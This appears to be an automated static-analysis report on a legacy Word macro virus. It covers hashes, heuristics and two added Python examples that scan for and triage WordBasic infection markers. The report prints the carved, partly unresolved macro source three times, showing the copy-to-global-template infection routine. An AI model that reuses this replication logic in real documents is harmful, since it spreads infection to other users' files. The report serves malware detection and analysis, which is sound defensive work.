Win.Trojan.GreenBay-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 4436f0b4eb5f287f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 8.0 KB
First seen: 2012-06-14
MD5: 551fbc57dea9c01bc4c9f6f9c7b90850
SHA-1: 5f33f56a816363f7c1015944fc65baf6399a8154
SHA-256: 4436f0b4eb5f287fb50699fec4ba88d1a8fefd711161e232964887e3fc5f21d0
Risk score: 102

Malware Insights

Win.Trojan.GreenBay-1 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample carries legacy WordBasic macro-virus markers and is detected by ClamAV as Win.Trojan.GreenBay-1. The document contains numerous references to the macro names AutoOpen, FileNew and FileSave. In Word 6/95, AutoOpen is an auto macro that runs when the document is opened, while FileNew and FileSave are the names of built-in Word commands that a same-named macro stored in the global template (Normal.dot) intercepts; the recovered source copies macros under exactly those names to and from "Global:" targets. This points to macros that are meant to run automatically and to install themselves into the global template, the classic Word 6/95 macro-virus infection pattern.

Heuristics (3)

  • ClamAV: Win.Trojan.GreenBay-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.GreenBay-1.
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    The OLE Word document contains legacy WordBasic auto-execution macro markers (AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro, or the names of historical macro viruses). Word 6/95 stores these macros in tokenised form inside the WordDocument stream, not as a VBA project, so extractors that only look for a VBA project storage report no macros at all.
  • Recovered legacy WordBasic macro source [info] OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    Because the Word 6.0/95 macros live tokenised in the WordDocument stream rather than in a VBA project, VBA source extraction cannot see them. The analyzer detokenised and carved the macro source so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning. Statements the detokeniser could not name appear in the carve as numbered @cmd tokens.
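The two heuristics above rest on one observation: a Word 6/95 infector leaves auto-execution macro names and macro-installation markers in the WordDocument stream, and has no VBA project storage for a VBA extractor to find. The following is an added example (not the analyzer's own code) that reproduces that check over raw stream bytes; SAMPLE_INFECTED and SAMPLE_CLEAN are constructed byte strings standing in for a WordDocument stream, and the optional scan_ole_file helper assumes the third-party olefile package only for opening a real container.

```python
"""Heuristic scan for legacy Word 6/95 WordBasic macro markers in an OLE document.

Added example, not the analyzer's own code. It mirrors the idea behind the
OLE_LEGACY_WORDBASIC_MACRO_VIRUS heuristic: flag a WordDocument stream in which
auto-execution macro names co-occur with macro-installation markers.
SAMPLE_INFECTED / SAMPLE_CLEAN below are constructed stand-ins, not real streams.
"""
from dataclasses import dataclass, field
from typing import Dict, Optional

# Word 6/95 auto macros plus built-in command names that a same-named macro in
# the global template intercepts. The heuristic text names AutoOpen, FileNew
# and FileSave; the other names are the rest of the standard WordBasic set.
AUTO_EXEC = (b"AutoOpen", b"AutoClose", b"AutoNew", b"AutoExec", b"AutoExit",
             b"FileNew", b"FileSave", b"FileSaveAs", b"FileOpen")
# Installation / propagation markers listed in the heuristic text, plus the
# "Global:" prefix WordBasic uses to address macros in the global template.
PROPAGATION = (b"MacroCopy", b"ToolsMacro", b"MacroFile", b"fileMacro",
               b"globMacro", b"Global:")


def _count(stream: bytes, name: bytes) -> int:
    """Count ASCII and UTF-16LE occurrences of a marker in the stream."""
    return stream.count(name) + stream.count(name.decode("ascii").encode("utf-16-le"))


@dataclass
class LegacyMacroScan:
    auto_exec: Dict[str, int] = field(default_factory=dict)
    propagation: Dict[str, int] = field(default_factory=dict)
    has_vba_project: Optional[bool] = None  # None when scanned from raw bytes

    @property
    def suspicious(self) -> bool:
        # Fire only when an auto-execution name AND an installation marker are
        # both present, mirroring "AutoOpen plus ToolsMacro/MacroFile/..." above.
        return bool(self.auto_exec) and bool(self.propagation)


def scan_wordbasic_markers(stream: bytes) -> LegacyMacroScan:
    """Scan raw WordDocument-stream bytes for both marker sets."""
    result = LegacyMacroScan()
    for name in AUTO_EXEC:
        n = _count(stream, name)
        if n:
            result.auto_exec[name.decode()] = n
    for name in PROPAGATION:
        n = _count(stream, name)
        if n:
            result.propagation[name.decode()] = n
    return result


def scan_ole_file(path: str) -> Optional[LegacyMacroScan]:
    """Open an OLE container with olefile (third-party; assumed installed for
    this function only), scan its WordDocument stream and note whether a modern
    VBA project storage ("Macros") exists. A Word 6/95 file has the stream but
    no such storage, which is why VBA-only extractors miss its macros."""
    try:
        import olefile
    except ImportError:
        return None
    ole = olefile.OleFileIO(path)
    try:
        if not ole.exists("WordDocument"):
            return None
        result = scan_wordbasic_markers(ole.openstream("WordDocument").read())
        result.has_vba_project = ole.exists("Macros")
    finally:
        ole.close()
    return result


# Constructed stand-ins (not valid FIB headers): filler bytes followed by what
# a macro name table and tokenised body fragments of an infector look like.
SAMPLE_INFECTED = (b"\x00" * 64
                   + b"AutoOpen\x00FileNew\x00FileSave\x00" + b"\x00" * 16
                   + b"MacroCopy" + b"Global:AutoOpen\x00" + b"\x00" * 32)
SAMPLE_CLEAN = b"\x00" * 64 + b"Quarterly report text.\x00" * 4

if __name__ == "__main__":
    for label, blob in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        r = scan_wordbasic_markers(blob)
        print(label, "SUSPICIOUS" if r.suspicious else "clean", r.auto_exec, r.propagation)
```

Requiring both marker sets keeps an ordinary document that merely mentions "AutoOpen" in its text from firing; a sample that names auto macros and also references "Global:" or MacroCopy is the combination worth escalating to the detokeniser.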

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 1832 bytes
SHA-256: b3cd245ef2ae9a824fd40092023544322eeb26304fb3b11e2799bf894c7f9dcd
Preview of the extracted script. The carve repeats the same macro body three times; statements the detokeniser could not name appear as @cmdNNNN tokens, and the stray numbers are residue of the tokenised form.
= = = , = 20069 21349 =
MAIN
, - * ErrorHandler
@cmd0056 = "Green Bay Packers -- Super Bowl XXXI Champions"
FName$ = @cmd8025
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 MacName$ , "Global:AutoOpen"
@cmd80c2 MacName$ , "Global:FileNew"
@cmd80c2 MacName$ , "Global:FileSave"
=
29285
, - * AutoOpenHandler
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , MacName$
29285
, - * FileNewHandler
MacName$ = FName$ = ":FileNew"
@cmd80c2 "Global:FileNew" , MacName$ 20069
29285
, - * FileSaveHandler
MacName$ = FName$ = ":FileSave"
@cmd80c2 "Global:FileSave" , MacName$ 21349
29285
@cmd0054 = 1
=      
, - * 0
, - * EndCode
=
MAIN
, - * ErrorHandler
@cmd0056 = "Green Bay Packers -- Super Bowl XXXI Champions"
FName$ = @cmd8025
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 MacName$ , "Global:AutoOpen"
@cmd80c2 MacName$ , "Global:FileNew"
@cmd80c2 MacName$ , "Global:FileSave"
=
29285
, - * AutoOpenHandler
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , MacName$
29285
, - * FileNewHandler
MacName$ = FName$ = ":FileNew"
@cmd80c2 "Global:FileNew" , MacName$ 20069
29285
, - * FileSaveHandler
MacName$ = FName$ = ":FileSave"
@cmd80c2 "Global:FileSave" , MacName$ 21349
29285
@cmd0054 = 1
=      
, - * 0
, - * EndCode
=
MAIN
, - * ErrorHandler
@cmd0056 = "Green Bay Packers -- Super Bowl XXXI Champions"
FName$ = @cmd8025
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 MacName$ , "Global:AutoOpen"
@cmd80c2 MacName$ , "Global:FileNew"
@cmd80c2 MacName$ , "Global:FileSave"
=
29285
, - * AutoOpenHandler
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , MacName$
29285
, - * FileNewHandler
MacName$ = FName$ = ":FileNew"
@cmd80c2 "Global:FileNew" , MacName$ 20069
29285
, - * FileSaveHandler
MacName$ = FName$ = ":FileSave"
@cmd80c2 "Global:FileSave" , MacName$ 21349
29285
@cmd0054 = 1
=      
, - * 0
, - * EndCode
=
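The carved source is short but already answers the triage questions an analyst asks of a macro virus: which auto macros and built-in commands are hooked, whether the code copies itself into the global template and back, and which string literals are worth a signature. The following is an added example (not the analyzer's code) that extracts those facts from the detokenised text. MACRO_TEXT is the first of the three identical bodies shown in the preview above. The @cmdNNNN tokens are unresolved and are counted, not interpreted; in WordBasic a macro in the global template is addressed as "Global:Name", so a two-argument statement with such a destination has the shape of a copy into the global template, and that shape is all the example records.

```python
"""Triage of a detokenised Word 6/95 WordBasic carve such as wordbasic_macros.txt.

Added example, not the analyzer's code. MACRO_TEXT is copied from the preview
above (one of the three identical macro bodies). @cmdNNNN tokens are WordBasic
statements the detokeniser left unresolved; they are reported, not decoded.
"""
import re
from collections import Counter
from typing import Dict, List

MACRO_TEXT = """MAIN
, - * ErrorHandler
@cmd0056 = "Green Bay Packers -- Super Bowl XXXI Champions"
FName$ = @cmd8025
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 MacName$ , "Global:AutoOpen"
@cmd80c2 MacName$ , "Global:FileNew"
@cmd80c2 MacName$ , "Global:FileSave"
=
29285
, - * AutoOpenHandler
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , MacName$
29285
, - * FileNewHandler
MacName$ = FName$ = ":FileNew"
@cmd80c2 "Global:FileNew" , MacName$ 20069
29285
, - * FileSaveHandler
MacName$ = FName$ = ":FileSave"
@cmd80c2 "Global:FileSave" , MacName$ 21349
29285
@cmd0054 = 1
=
, - * 0
, - * EndCode
=
"""

LABEL_RE = re.compile(r"^, - \* (\w+)", re.M)                    # routine/label markers
STRING_RE = re.compile(r'"([^"\n]*)"')                             # string literals
TOKEN_RE = re.compile(r"@cmd([0-9a-f]{4})")                        # unresolved statements
CALL_RE = re.compile(r"^(@cmd[0-9a-f]{4}) (\S+) , (\S+)", re.M)   # two-argument statements
AUTO_MACROS = {"AutoOpen", "AutoClose", "AutoNew", "AutoExec", "AutoExit"}


def triage(text: str) -> Dict[str, object]:
    """Summarise hooked names, global-template traffic and scannable literals."""
    labels = LABEL_RE.findall(text)
    strings = STRING_RE.findall(text)
    tokens = Counter(TOKEN_RE.findall(text))

    to_global: List[str] = []    # document macro -> "Global:Name" (install)
    from_global: List[str] = []  # "Global:Name" -> document macro (re-infect)
    for _stmt, src, dst in CALL_RE.findall(text):
        if dst.startswith('"Global:'):
            to_global.append(dst.strip('"').split(":", 1)[1])
        elif src.startswith('"Global:'):
            from_global.append(src.strip('"').split(":", 1)[1])

    hooked = set(to_global) | set(from_global)
    # Literals that are neither macro addresses nor ":Name" suffixes are the
    # strings worth signature-scanning (message text, paths, URLs, keys).
    iocs = [s for s in strings if not s.startswith(("Global:", ":"))]
    return {
        "labels": labels,
        "unresolved_tokens": dict(tokens),
        "to_global": to_global,
        "from_global": from_global,
        "auto_macros_hooked": sorted(hooked & AUTO_MACROS),
        "commands_hooked": sorted(hooked - AUTO_MACROS),
        "self_installs": bool(to_global) and bool(from_global),
        "ioc_strings": sorted(set(iocs)),
    }


if __name__ == "__main__":
    for key, value in triage(MACRO_TEXT).items():
        print(f"{key}: {value}")
```

On this carve the result is the pattern the heuristics describe: the same unresolved statement is called three times with "Global:" destinations and three times with "Global:" sources, AutoOpen is the hooked auto macro, FileNew and FileSave are the hooked commands, and the only free-standing literal is the Packers message, which is the natural signature string.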